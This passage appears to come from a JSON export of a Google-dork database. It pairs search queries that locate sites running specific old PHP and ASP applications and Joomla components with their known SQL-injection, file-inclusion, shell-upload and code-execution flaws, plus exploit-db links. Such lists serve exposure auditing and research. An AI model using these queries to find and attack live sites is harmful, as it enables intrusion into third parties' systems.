"long description": "Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/7644", "submited": "2010-11-15", "request": "\"PHP Link Portal v1.95.1 Big Resources, Inc.\"", "id": 2836}, {"short description": "[ Copyright 2005-2006 phpDirectorySource, all rights reserved ]", "long description": "phpDirectorySource (XSS/SQL) Multiple Remote Vulnerabilities - CVE: 2009-4681: 
http://www.exploit-db.com/exploits/9226", "submited": "2010-11-15", "request": "[ Copyright 2005-2006 phpDirectorySource, all rights reserved ]", "id": 2841}, {"short description": "\"Powered by Comdev News Publisher\"", "long description": "Comdev News Publisher Remote SQL Injection Vulnerability - CVE: 2008-1872: http://www.exploit-db.com/exploits/5362", "submited": "2010-11-15", "request": "\"Powered by Comdev News Publisher\"", "id": 2843}, {"short description": "Powered By: AJ Square Inc", "long description": "AJ Article Persistent XSS Vulnerability - CVE: 2010-2917: http://www.exploit-db.com/exploits/14354", "submited": "2010-11-15", "request": "Powered By: AJ Square Inc", "id": 2844}, {"short description": "\"index.php?option=com_sef\" / \"com_sef\"", "long description": "Joomla Component Sef (com_sef) - LFI Vulnerability: http://www.exploit-db.com/exploits/14213", "submited": "2010-11-15", "request": "\"index.php?option=com_sef\" / \"com_sef\"", "id": 2845}, {"short description": "inurl:option=com_huruhelpdesk", "long description": "joomla component huruhelpdesk SQL injection Vulnerability: http://www.exploit-db.com/exploits/12124", "submited": "2010-11-15", "request": "inurl:option=com_huruhelpdesk", "id": 2846}, {"short description": "inurl:inc_securedocumentlibrary.asp", "long description": "DMXReady Secure Document Library 1.1 Remote SQL Injection Vuln - CVE: 2009-0428: http://www.exploit-db.com/exploits/7787", "submited": "2010-11-15", "request": "inurl:inc_securedocumentlibrary.asp", "id": 2847}, {"short description": "Powered by Dolphin", "long description": "Dolphin v7.0.3 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15400", "submited": "2010-11-15", "request": "Powered by Dolphin", "id": 2848}, {"short description": "inurl:\"php/showContent.php?linkid=\"", "long description": "Worldviewer.com CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12163", "submited": "2010-11-15", "request": 
"inurl:\"php/showContent.php?linkid=\"", "id": 2849}, {"short description": "sitou timou tumou tou", "long description": "Drunken:Golem Gaming Portal (admin_news_bot.php) RFI Vulnerability - CVE: 2009-4622: http://www.exploit-db.com/exploits/9635", "submited": "2010-11-15", "request": "sitou timou tumou tou", "id": 2850}, {"short description": "inurl:.asp? Powered by Comersus ASP Shopping Cart", "long description": "Comersus ASP Shopping Cart (DD/XSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/7259", "submited": "2010-11-15", "request": "inurl:.asp? Powered by Comersus ASP Shopping Cart", "id": 2852}, {"short description": "inurl:index.php?option=com_lowcosthotels", "long description": "Joomla Component com_lowcosthotels (id) Blind SQL Injection Vuln - CVE: 2008-5864: http://www.exploit-db.com/exploits/7567", "submited": "2010-11-15", "request": "inurl:index.php?option=com_lowcosthotels", "id": 2853}, {"short description": "Vibro-School CMS by nicLOR.net", "long description": "Vibro-School-CMS (nID) Remote SQL injection Vulnerability - CVE: 2008-6795: http://www.exploit-db.com/exploits/6981", "submited": "2010-11-15", "request": "Vibro-School CMS by nicLOR.net", "id": 2854}, {"short description": "\"Absolute Poll Manager XE\"", "long description": "Absolute Poll Manager XE 4.1 Cookie Handling Vulnerability - CVE: 2008-6860: http://www.exploit-db.com/exploits/6883", "submited": "2010-11-15", "request": "\"Absolute Poll Manager XE\"", "id": 2855}, {"short description": "Copyright 2010. Software Index", "long description": "PishBini Footbal XSS and SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14000", "submited": "2010-11-15", "request": "Copyright 2010. 
Software Index", "id": 2856}, {"short description": "inurl:\"com_linkdirectory\"", "long description": "Joomla Link Directory Component 1.0.3 Remote Include Vulnerability: http://www.exploit-db.com/exploits/2214", "submited": "2010-11-15", "request": "inurl:\"com_linkdirectory\"", "id": 2857}, {"short description": "inurl:com_manager", "long description": "Joomla Component com_manager 1.5.3 (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12257", "submited": "2010-11-15", "request": "inurl:com_manager", "id": 2858}, {"short description": "\"Developed by Infoware Solutions\"", "long description": "My PHP Dating (success_story.php id) SQL Injection Vulnerability - CVE: 2008-4705: http://www.exploit-db.com/exploits/6754", "submited": "2010-11-15", "request": "\"Developed by Infoware Solutions\"", "id": 2859}, {"short description": "\"Powered by: Yes Solutions\"", "long description": "Yes Solutions - Webapp SQL Injection: http://www.exploit-db.com/exploits/11368", "submited": "2010-11-15", "request": "\"Powered by: Yes Solutions\"", "id": 2860}, {"short description": "allinurl:\"verliadmin\"", "long description": "VerliAdmin 0.3 (index.php) Remote File Include - CVE: 2006-6666: http://www.exploit-db.com/exploits/2944", "submited": "2010-11-15", "request": "allinurl:\"verliadmin\"", "id": 2861}, {"short description": "\"Powered by UNAK-CMS\"", "long description": "UNAK-CMS 1.5 (dirroot) Remote File Include Vulnerabilities - CVE: 2006-4890: http://www.exploit-db.com/exploits/2380", "submited": "2010-11-15", "request": "\"Powered by UNAK-CMS\"", "id": 2862}, {"short description": "inurl:\"com_quickfaq\"", "long description": "Joomla QuickFAQ Component (com_quickfaq) Blind SQL Injection Vulnerability - CVE: 2010-2845: http://www.exploit-db.com/exploits/14296", "submited": "2010-11-15", "request": "inurl:\"com_quickfaq\"", "id": 2863}, {"short description": "Powered by PBBoard 2009 Version 2.0.5", "long description": "PBBoard Version 2.0.5 Mullti 
Vulnerability: http://www.exploit-db.com/exploits/11570", "submited": "2010-11-15", "request": "Powered by PBBoard 2009 Version 2.0.5", "id": 2864}, {"short description": "\"Powered by EZCMS\"", "long description": "EZCMS 1.2 (bSQL/Admin Byapss) Multiple Remote Vulnerabilities - CVE: 2008-2921: http://www.exploit-db.com/exploits/5819", "submited": "2010-11-15", "request": "\"Powered by EZCMS\"", "id": 2865}, {"short description": "inurl:index.php?menu=adorder", "long description": "ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability - CVE: 2008-3944: http://www.exploit-db.com/exploits/6362", "submited": "2010-11-15", "request": "inurl:index.php?menu=adorder", "id": 2866}, {"short description": "allinurl:\"com_accombo\"", "long description": "Mambo Component accombo 1.x (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5279", "submited": "2010-11-15", "request": "allinurl:\"com_accombo\"", "id": 2867}, {"short description": "\"Powered by Scratcher\"", "long description": "Scratcher (SQL/XSS) Multiple Remote Vulnerability - CVE: 2010-1742: http://www.exploit-db.com/exploits/12458", "submited": "2010-11-15", "request": "\"Powered by Scratcher\"", "id": 2868}, {"short description": "inurl:/components/je-media-player.html?", "long description": "Joomla JE Media Player Component LFI Vulnerability: http://www.exploit-db.com/exploits/14060", "submited": "2010-11-15", "request": "inurl:/components/je-media-player.html?", "id": 2869}, {"short description": "\"Powered by How2asp\"", "long description": "How2ASP.net Webboard 4.1 Remote SQL Injection Vulnerability - CVE: 2008-2417: http://www.exploit-db.com/exploits/5638", "submited": "2010-11-15", "request": "\"Powered by How2asp\"", "id": 2870}, {"short description": "\"Powered by PHPBasket\"", "long description": "PHPBasket (product.php pro_id) SQL Injection Vulnerability - CVE: 2008-3713: http://www.exploit-db.com/exploits/6258", "submited": "2010-11-15", "request": "\"Powered by PHPBasket\"", "id": 
2871}, {"short description": ": [allinurl: op=viewslink&sid=]", "long description": "http://www.exploit-db.com/exploits/12514", "submited": "2010-11-15", "request": "", "id": 2872}, {"short description": "\"Forum Active Bulletin Board version 1.1 beta 2\"", "long description": "Active Bulletin Board", "submited": "2010-11-15", "request": "\"Forum Active Bulletin Board version 1.1 beta 2\"", "id": 2873}, {"short description": "inurl:module=My_eGallery pid", "long description": "MDPro Module My_eGallery (pid) Remote SQL Injection - CVE: 2009-0728: http://www.exploit-db.com/exploits/8100", "submited": "2010-11-15", "request": "inurl:module=My_eGallery pid", "id": 2874}, {"short description": "\"Powered by Dayfox Designs\"", "long description": "Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability - CVE: 2007-1525: http://www.exploit-db.com/exploits/3478", "submited": "2010-11-15", "request": "\"Powered by Dayfox Designs\"", "id": 2875}, {"short description": "Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media", "long description": "Subdreamer.v3.0.1 cms upload Vulnerability: http://www.exploit-db.com/exploits/11749", "submited": "2010-11-15", "request": "Website powered by Subdreamer CMS & Sequel Theme Designed by indiqo.media", "id": 2876}, {"short description": "\"These forums are running on\" \"miniBB\"", "long description": "miniBB 2.1 (table) Remote SQL Injection Vulnerability - CVE: 2007-5719: http://www.exploit-db.com/exploits/4587", "submited": "2010-11-15", "request": "\"These forums are running on\" \"miniBB\"", "id": 2877}, {"short description": "\"PHPNews Version 0.93\"", "long description": "PHPNews 0.93 (format_menue) Remote File Inclusion Vulnerability - CVE: 2007-4232: http://www.exploit-db.com/exploits/4268", "submited": "2010-11-15", "request": "\"PHPNews Version 0.93\"", "id": 2878}, {"short description": "\"/nuke/iframe.php\"", "long description": "iFrame for Phpnuke (iframe.php) Remote File Inclusion 
Vulnerability - CVE: 2007-1626: http://www.exploit-db.com/exploits/3512", "submited": "2010-11-15", "request": "\"/nuke/iframe.php\"", "id": 2879}, {"short description": "Sad Raven's Click Counter v1.0", "long description": "Sad Raven's Click Counter 1.0 passwd.dat Disclosure: http://www.exploit-db.com/exploits/7844", "submited": "2010-11-15", "request": "Sad Raven's Click Counter v1.0", "id": 2880}, {"short description": "Powered by dB Masters' Curium CMS 1", "long description": "dB Masters Curium CMS 1.03 (c_id) Remote SQL Injection Vulnerability - CVE: 2007-0765: http://www.exploit-db.com/exploits/3256", "submited": "2010-11-15", "request": "Powered by dB Masters' Curium CMS 1", "id": 2882}, {"short description": "Powered by XT-Commerce", "long description": "XT-Commerce v1 Beta 1 by Pass / Creat and Download Backup Vulnerability: http://www.exploit-db.com/exploits/12447", "submited": "2010-11-15", "request": "Powered by XT-Commerce", "id": 2883}, {"short description": "intext:\"Powered by Ramaas Software\"", "long description": "Ramaas Software CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12412", "submited": "2010-11-15", "request": "intext:\"Powered by Ramaas Software\"", "id": 2884}, {"short description": "Powered by Maian Greetings v2.1", "long description": "Maian Greetings v2.1 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11301", "submited": "2010-11-15", "request": "Powered by Maian Greetings v2.1", "id": 2885}, {"short description": "\"Yogurt build\"", "long description": "Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities - CVE: 2009-2033: http://www.exploit-db.com/exploits/8932", "submited": "2010-11-15", "request": "\"Yogurt build\"", "id": 2886}, {"short description": "inurl:e107_plugins", "long description": "e107 Code Exec - CVE: 2010-2099: http://www.exploit-db.com/exploits/12715", "submited": "2010-11-15", "request": "inurl:e107_plugins", "id": 2887}, {"short description": "\"Scientific Image 
DataBase\"", "long description": "Scientific Image DataBase 0.41 Blind SQL Injection - CVE: 2008-2834: http://www.exploit-db.com/exploits/5885", "submited": "2010-11-15", "request": "\"Scientific Image DataBase\"", "id": 2888}, {"short description": "Powered by phpMyRealty", "long description": "phpMyRealty 1.0.x (search.php type) Remote SQL Injection Vulnerability - CVE: 2007-6472: http://www.exploit-db.com/exploits/4750", "submited": "2010-11-15", "request": "Powered by phpMyRealty", "id": 2889}, {"short description": "\"Powered by myUPB\"", "long description": "myUPB v2.2.6 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/13957", "submited": "2010-11-15", "request": "\"Powered by myUPB\"", "id": 2891}, {"short description": "inurl:\"com_simpledownload\"", "long description": "Joomla Component simpledownload LFI Vulnerability - CVE: 2010-2122: http://www.exploit-db.com/exploits/12618", "submited": "2010-11-15", "request": "inurl:\"com_simpledownload\"", "id": 2893}, {"short description": "Powered by Flinx", "long description": "flinx 1.3 (category.php id) Remote SQL Injection Vulnerabilit - CVE: 2008-0468: http://www.exploit-db.com/exploits/4985", "submited": "2010-11-15", "request": "Powered by Flinx", "id": 2895}, {"short description": "allinurl:\"com_restaurante\"", "long description": "Joomla Component Restaurante 1.0 (id) SQL Injection Vulnerability - CVE: 2008-1465: http://www.exploit-db.com/exploits/5280", "submited": "2010-11-15", "request": "allinurl:\"com_restaurante\"", "id": 2896}, {"short description": "Powered by MyHobbySite 1.01", "long description": "MyHobbySite 1.01 SQL Injection and Authentication Bypass Vulnerability: http://www.exploit-db.com/exploits/14977", "submited": "2010-11-15", "request": "Powered by MyHobbySite 1.01", "id": 2897}, {"short description": "inurl:index.php?myPlantId=", "long description": "Member ID The Fish Index PHP SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12850", "submited": 
"2010-11-15", "request": "inurl:index.php?myPlantId=", "id": 2898}, {"short description": "\"powered by real-estate-website\"", "long description": "Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/5763", "submited": "2010-11-15", "request": "\"powered by real-estate-website\"", "id": 2901}, {"short description": "\"Powered by [ iSupport 1.8 ]\"", "long description": "iSupport 1.8 XSS/LFI - CVE: 2009-4434: http://www.exploit-db.com/exploits/10478", "submited": "2010-11-15", "request": "\"Powered by [ iSupport 1.8 ]\"", "id": 2902}, {"short description": "\"This site is powered by CMS Made Simple version 1.2.2\"", "long description": "CMS Made Simple 1.2.2 (TinyMCE module) SQL Injection Vuln - CVE: 2007-6656: http://www.exploit-db.com/exploits/4810", "submited": "2010-11-15", "request": "\"This site is powered by CMS Made Simple version 1.2.2\"", "id": 2903}, {"short description": "infusions/manuals/manuals.php?manual=", "long description": "PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6681", "submited": "2010-11-15", "request": "infusions/manuals/manuals.php?manual=", "id": 2905}, {"short description": "allinurl:/modernbill/", "long description": "Modernbill 1.6 (config.php) Remote File Include Vulnerability - CVE: 2006-4034: http://www.exploit-db.com/exploits/2127", "submited": "2010-11-15", "request": "allinurl:/modernbill/", "id": 2906}, {"short description": "Powered by EasySiteNetwork", "long description": "Wallpaper Site 1.0.09 (category.php) Remote SQL Injection Vulnerability - CVE: 2007-6580: http://www.exploit-db.com/exploits/4770", "submited": "2010-11-15", "request": "Powered by EasySiteNetwork", "id": 2907}, {"short description": "inurl:\"main_forum.php?cat=\"", "long description": "GeN3 forum V1.3 SQL Injection Vulnerability - CVE: 2009-4263: http://www.exploit-db.com/exploits/10299", "submited": "2010-11-15", "request": 
"inurl:\"main_forum.php?cat=\"", "id": 2908}, {"short description": "\"eCommerce Engine 2006 xt:Commerce Shopsoftware\"", "long description": "xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability: http://www.exploit-db.com/exploits/15455", "submited": "2010-11-15", "request": "\"eCommerce Engine 2006 xt:Commerce Shopsoftware\"", "id": 2910}, {"short description": "intitle:\"Powered by Open Bulletin Board\"", "long description": "Open Bulletin Board Multiple Blind Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11336", "submited": "2010-11-15", "request": "intitle:\"Powered by Open Bulletin Board\"", "id": 2911}, {"short description": "\"My Photo v1.46.4 Big Resources\"", "long description": "Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/7645", "submited": "2010-11-15", "request": "\"My Photo v1.46.4 Big Resources\"", "id": 2912}, {"short description": "Powered by Fantastic News v2.1.4", "long description": "Fantastic News 2.1.4 Multiple Remote File Include Vulnerabilities: http://www.exploit-db.com/exploits/3027", "submited": "2010-11-15", "request": "Powered by Fantastic News v2.1.4", "id": 2913}, {"short description": "Platform Dokeos 1.8.4 2007", "long description": "Dokeos 1.8.4 Bypass Upload Shell From Your Profile Vulnerability - CVE: 2007-6479: http://www.exploit-db.com/exploits/4753", "submited": "2010-11-15", "request": "Platform Dokeos 1.8.4 2007", "id": 2914}, {"short description": "\"Powered by iScripts SocialWare\"", "long description": "iScripts SocialWare (id) Remote SQL Injection Vulnerbility - CVE: 2008-1772: http://www.exploit-db.com/exploits/5402", "submited": "2010-11-15", "request": "\"Powered by iScripts SocialWare\"", "id": 2915}, {"short description": "Powered By eLitius 1.0", "long description": "eLitius 1.0 Arbitrary Database Backup: http://www.exploit-db.com/exploits/8498", "submited": "2010-11-15", "request": "Powered By eLitius 1.0", "id": 
2916}, {"short description": "inurl:\"com_artlinks\"", "long description": "Joomla Artlinks Component 1.0b4 Remote Include Vulnerability - CVE: 2006-3949: http://www.exploit-db.com/exploits/2209", "submited": "2010-11-15", "request": "inurl:\"com_artlinks\"", "id": 2917}, {"short description": "inurl:com_djclassifieds", "long description": "Joomla DJ-Classifieds Extension com_djclassifieds Upload Vulnerability: http://www.exploit-db.com/exploits/12479", "submited": "2010-11-15", "request": "inurl:com_djclassifieds", "id": 2918}, {"short description": "intext:\"Remository 3.25. is technology by Black Sheep Research\"", "long description": "Mambo Remository Component 3.25 Remote Include Vulnerability - CVE: 2006-4130: http://www.exploit-db.com/exploits/2172", "submited": "2010-11-15", "request": "intext:\"Remository 3.25. is technology by Black Sheep Research\"", "id": 2919}, {"short description": "inurl:ratelink.php?lnkid=", "long description": "Link Trader (ratelink.php lnkid) Remote SQL Injection Vulnerability - CVE: 2008-6102: http://www.exploit-db.com/exploits/6650", "submited": "2010-11-15", "request": "inurl:ratelink.php?lnkid=", "id": 2920}, {"short description": "Powered by: deonixscripts.com", "long description": "Web Template Management System 1.3 Remote SQL Injection - CVE: 2007-5233: http://www.exploit-db.com/exploits/4482", "submited": "2010-11-15", "request": "Powered by: deonixscripts.com", "id": 2921}, {"short description": "inurl:com_ybggal", "long description": "Joomla Component com_ybggal 1.0 (catid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13979", "submited": "2010-11-15", "request": "inurl:com_ybggal", "id": 2922}, {"short description": "Powered By Power Editor", "long description": "Power Editor 2.0 Remote File Disclosure / Edit Vulnerability - CVE: 2008-2116: http://www.exploit-db.com/exploits/5549", "submited": "2010-11-15", "request": "Powered By Power Editor", "id": 2923}, {"short description": "\"Powered by: 
eSmile\"", "long description": "eSmile Script (index.php) SQL Injection Vulnerability - CVE: 2010-0764: http://www.exploit-db.com/exploits/11382", "submited": "2010-11-15", "request": "\"Powered by: eSmile\"", "id": 2924}, {"short description": "\"advanced_search_results.php?gender=\"", "long description": "Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability - CVE: 2008-4461: http://www.exploit-db.com/exploits/6388", "submited": "2010-11-15", "request": "\"advanced_search_results.php?gender=\"", "id": 2925}, {"short description": "allinurl:\"com_ahsshop\"do=default", "long description": "Mambo Component ahsShop 1.51 (vara) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5335", "submited": "2010-11-15", "request": "allinurl:\"com_ahsshop\"do=default", "id": 2926}, {"short description": "inurl:com_ice \"catid\"", "long description": "Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln - CVE: 2008-6852: http://www.exploit-db.com/exploits/7572", "submited": "2010-11-15", "request": "inurl:com_ice \"catid\"", "id": 2927}, {"short description": "Powered by ExoPHPDesk v1.2 Final.", "long description": "ExoPHPDesk 1.2.1 (faq.php) Remote SQL Injection Vulnerability - CVE: 2007-0676: http://www.exploit-db.com/exploits/3234", "submited": "2010-11-15", "request": "Powered by ExoPHPDesk v1.2 Final.", "id": 2928}, {"short description": "allinurl:spaw2/dialogs/", "long description": "Spaw Editor v1.0 & 2.0 Remote File Upload: http://www.exploit-db.com/exploits/12672", "submited": "2010-11-15", "request": "allinurl:spaw2/dialogs/", "id": 2931}, {"short description": "Powered by eLitius Version 1.0", "long description": "eLitius 1.0 (banner-details.php id) SQL Injection Vulnerability - CVE: 2009-1506: http://www.exploit-db.com/exploits/8563", "submited": "2010-11-15", "request": "Powered by eLitius Version 1.0", "id": 2932}, {"short description": "site:scartserver.com", "long description": "SCart 2.0 (page) Remote Code Execution - CVE: 
2006-7012: http://www.exploit-db.com/exploits/1876", "submited": "2010-11-15", "request": "site:scartserver.com", "id": 2935}, {"short description": "\"realizacja eCreo.eu\"", "long description": "eCreo SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12713", "submited": "2010-11-15", "request": "\"realizacja eCreo.eu\"", "id": 2936}, {"short description": "inurl:index.php?title=gamepage", "long description": "PHP Gamepage SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12634", "submited": "2010-11-15", "request": "inurl:index.php?title=gamepage", "id": 2939}, {"short description": "inurl:index.php?option=com_akobook", "long description": "Joomla Component Akobook 2.3 (gbid) SQL Injection Vulnerability - CVE: 2009-2638: http://www.exploit-db.com/exploits/8911", "submited": "2010-11-15", "request": "inurl:index.php?option=com_akobook", "id": 2940}, {"short description": "inurl:\"/CMS/page.php?p=\"", "long description": "Schweizer NISADA Communication CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10543", "submited": "2010-11-15", "request": "inurl:\"/CMS/page.php?p=\"", "id": 2942}, {"short description": "Powered by CMScout (c)2005 CMScout Group", "long description": "CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities - CVE: 2008-6725: http://www.exploit-db.com/exploits/7625", "submited": "2010-11-15", "request": "Powered by CMScout (c)2005 CMScout Group", "id": 2943}, {"short description": "Powered by: Maian Uploader v4.0", "long description": "Maian Uploader v4.0 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11571", "submited": "2010-11-15", "request": "Powered by: Maian Uploader v4.0", "id": 2945}, {"short description": "intext:\"Tainos Webdesign\"", "long description": "Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability: http://www.exploit-db.com/exploits/12631", "submited": "2010-11-15", "request": "intext:\" Tainos Webdesign\"", "id": 2948}, {"short description": 
"inurl:\"com_virtuemart\"", "long description": "Joomla Component com_virtuemart SQL injection vulnerability (product_id): http://www.exploit-db.com/exploits/10407", "submited": "2010-11-15", "request": "inurl:\"com_virtuemart\"", "id": 2949}, {"short description": "\"Powered by RW::Download v2.0.3 lite\"", "long description": "RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln - CVE: 2007-4845: http://www.exploit-db.com/exploits/4371", "submited": "2010-11-15", "request": "\"Powered by RW::Download v2.0.3 lite\"", "id": 2950}, {"short description": "index.php?option=com_swmenupro", "long description": "Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability - CVE: 2007-1699: http://www.exploit-db.com/exploits/3557", "submited": "2010-11-15", "request": "index.php?option=com_swmenupro", "id": 2951}, {"short description": "\"Powered By OpenCart\"", "long description": "Opencart 1.4.9.1 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/15050", "submited": "2010-11-15", "request": "\"Powered By OpenCart\"", "id": 2952}, {"short description": "Powered by eclime.com", "long description": "eclime v1.1 ByPass / Create and Download Backup Vulnerability: http://www.exploit-db.com/exploits/12279", "submited": "2010-11-15", "request": "Powered by eclime.com", "id": 2953}, {"short description": "inurl:\"article.download.php\"", "long description": "Star Articles 6.0 Remote Blind SQL Injection Vulnerability - CVE: 2008-7075: http://www.exploit-db.com/exploits/7240", "submited": "2010-11-15", "request": "inurl:\"article.download.php\"", "id": 2955}, {"short description": "inurl:\"com_mojo\"", "long description": "Joomla MojoBlog Component v0.15 Multiple Remote File Include Vulnerabilities - CVE: 2009-4789: http://www.exploit-db.com/exploits/10273", "submited": "2010-11-15", "request": "inurl:\"com_mojo\"", "id": 2956}, {"short description": "inurl:\"article.download.php\"", "long description": "Star Articles 6.0 Remote Blind SQL Injection - 
CVE: 2008-7075: http://www.exploit-db.com/exploits/7243", "submited": "2010-11-15", "request": "inurl:\"article.download.php\"", "id": 2957}, {"short description": "\"Powered by LightBlog\" - Powered by LightBlog", "long description": "LightBlog 9.5 cp_upload_image.php Remote File Upload Vulnerability - CVE: 2008-0632: http://www.exploit-db.com/exploits/5033", "submited": "2010-11-15", "request": "\"Powered by LightBlog\" - Powered by LightBlog", "id": 2958}, {"short description": "\"Powered by photokorn\"", "long description": "photokron 1.7 (update script) Remote Database Disclosure - CVE: 2008-0297: http://www.exploit-db.com/exploits/4897/", "submited": "2010-11-15", "request": "\"Powered by photokorn\"", "id": 2959}, {"short description": "\"Site designed and built by Powder Blue.\" inurl:index.php?id_page=", "long description": "Powder Blue Design SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12671", "submited": "2010-11-15", "request": "\"Site designed and built by Powder Blue.\" inurl:index.php?id_page=", "id": 2960}, {"short description": "\"Powered by MetInfo 3.0\"", "long description": "MetInfo 3.0 PHP Code Injection Vulnerability: http://www.exploit-db.com/exploits/15361", "submited": "2010-11-15", "request": "\"Powered by MetInfo 3.0\"", "id": 2961}, {"short description": "\"Powered by MetInfo 2.0\"", "long description": "MetInfo 2.0 PHP Code Injection Vulnerability: http://www.exploit-db.com/exploits/15360", "submited": "2010-11-15", "request": "\"Powered by MetInfo 2.0\"", "id": 2962}, {"short description": "intext:\"Marketing Web Design - Posicionamiento en Buscadores\"", "long description": "Marketing Web Design Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12788", "submited": "2010-11-15", "request": "intext:\"Marketing Web Design - Posicionamiento en Buscadores\"", "id": 2963}, {"short description": "pages.php?id= \"Multi Vendor Mall\"", "long description": "Multi Vendor Mall (pages.php) SQL Injection 
Vulnerability: http://www.exploit-db.com/exploits/12748", "submited": "2010-11-15", "request": "pages.php?id= \"Multi Vendor Mall\"", "id": 2964}, {"short description": "allintext:\"Home Member Search Chat Room Forum Help/Support privacy policy\"", "long description": "eMeeting Online Dating Software 5.2 SQL Injection Vulnerabilities: CVE: 2007-3609: http://www.exploit-db.com/exploits/4154", "submited": "2010-11-15", "request": "allintext:\"Home Member Search Chat Room Forum Help/Support privacy policy\"", "id": 2966}, {"short description": "Powered by Zylone IT", "long description": "Zylone IT Multiple Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14270", "submited": "2010-11-15", "request": "Powered by Zylone IT", "id": 2968}, {"short description": ": \"intitle:t3al shmeh\"", "long description": "http://www.exploit-db.com/exploits/9347", "submited": "2010-11-15", "request": "", "id": 2969}, {"short description": "Powered by MetInfo 3.0", "long description": "Metinfo v3.0 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15496", "submited": "2010-11-15", "request": "Powered by MetInfo 3.0", "id": 2970}, {"short description": "Powered by Info Fisier.", "long description": "Info Fisier 1.0 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/10671", "submited": "2010-11-15", "request": "Powered by Info Fisier.", "id": 2971}, {"short description": "\"Powered by WebText\"", "long description": "WebText 0.4.5.2 Remote Code Execution - CVE: 2006-6856: http://www.exploit-db.com/exploits/3036", "submited": "2010-11-15", "request": "\"Powered by WebText\"", "id": 2972}, {"short description": "Webdevelopment Tinx-IT", "long description": "WebVision 2.1 (news.php n) Remote SQL Injection: http://www.exploit-db.com/exploits/9193", "submited": "2010-11-15", "request": "Webdevelopment Tinx-IT", "id": 2973}, {"short description": "\"PHPGlossar Version 0.8\"", "long description": "PHPGlossar 0.8 (format_menue) Remote File 
Inclusion Vulnerabilities - CVE: 2007-2751: http://www.exploit-db.com/exploits/3941", "submited": "2010-11-15", "request": "\"PHPGlossar Version 0.8\"", "id": 2975}, {"short description": "com_ijoomla_rss", "long description": "Joomla Component com_ijoomla_rss Blind SQL Injection - CVE: 2009-2099: http://www.exploit-db.com/exploits/8959", "submited": "2010-11-15", "request": "com_ijoomla_rss", "id": 2976}, {"short description": "inurl:\"?pilih=forum\"", "long description": "AuraCMS [Forum Module] Remote SQL Injection Vulnerability - CVE: 2007-4171: http://www.exploit-db.com/exploits/4254", "submited": "2010-11-15", "request": "inurl:\"?pilih=forum\"", "id": 2977}, {"short description": "\"Developed by Infoware Solutions\"", "long description": "infoware SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12714", "submited": "2010-11-15", "request": "\"Developed by Infoware Solutions\"", "id": 2978}, {"short description": "\"Powered by: MyPHP Forum\"", "long description": "MyPHP Forum", "submited": "2010-11-15", "request": "\"Powered by: MyPHP Forum\"", "id": 2979}, {"short description": "Ayemsis Emlak Pro", "long description": "Ayemsis Emlak Pro (acc.mdb) Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7665", "submited": "2010-11-15", "request": "Ayemsis Emlak Pro", "id": 2981}, {"short description": "Powered by Guruscript.com", "long description": "Freelancer Marketplace Script Upload Vulnerability: http://www.exploit-db.com/exploits/14390", "submited": "2010-11-15", "request": "Powered by Guruscript.com", "id": 2983}, {"short description": "allinurl:\"index.php?mod=archives\"", "long description": "KwsPHP Module Archives (id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5351", "submited": "2010-11-15", "request": "allinurl:\"index.php?mod=archives\"", "id": 2985}, {"short description": "\"index.php?option=com_qcontacts\"", "long description": "Joomla Component QContacts (com_qcontacts) SQL Injection 
Vulnerability: http://www.exploit-db.com/exploits/14350", "submited": "2010-11-15", "request": "\"index.php?option=com_qcontacts\"", "id": 2986}, {"short description": "Powered by sijio - Community Software", "long description": "Sijio Community Software SQL Injection/Persistent XSS Vulnerability - CVE: 2010-2696: http://www.exploit-db.com/exploits/14260", "submited": "2010-11-15", "request": "Powered by sijio - Community Software", "id": 2987}, {"short description": "\"Powered By CrownWeb.net!\" inurl:\"page.cfm\"", "long description": "crownweb (page.cfm) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11299", "submited": "2010-11-15", "request": "\"Powered By CrownWeb.net!\" inurl:\"page.cfm\"", "id": 2988}, {"short description": "Copyright @ 2007 Powered By Hot or Not Clone by Jnshosts.com Rate My Pic :: Home :: Advertise :: Contact us::", "long description": "Hot or Not Clone by Jnshosts.com Database Backup Dump Vulnerability - CVE: 2007-6603: http://www.exploit-db.com/exploits/4804", "submited": "2010-11-15", "request": "Copyright @ 2007 Powered By Hot or 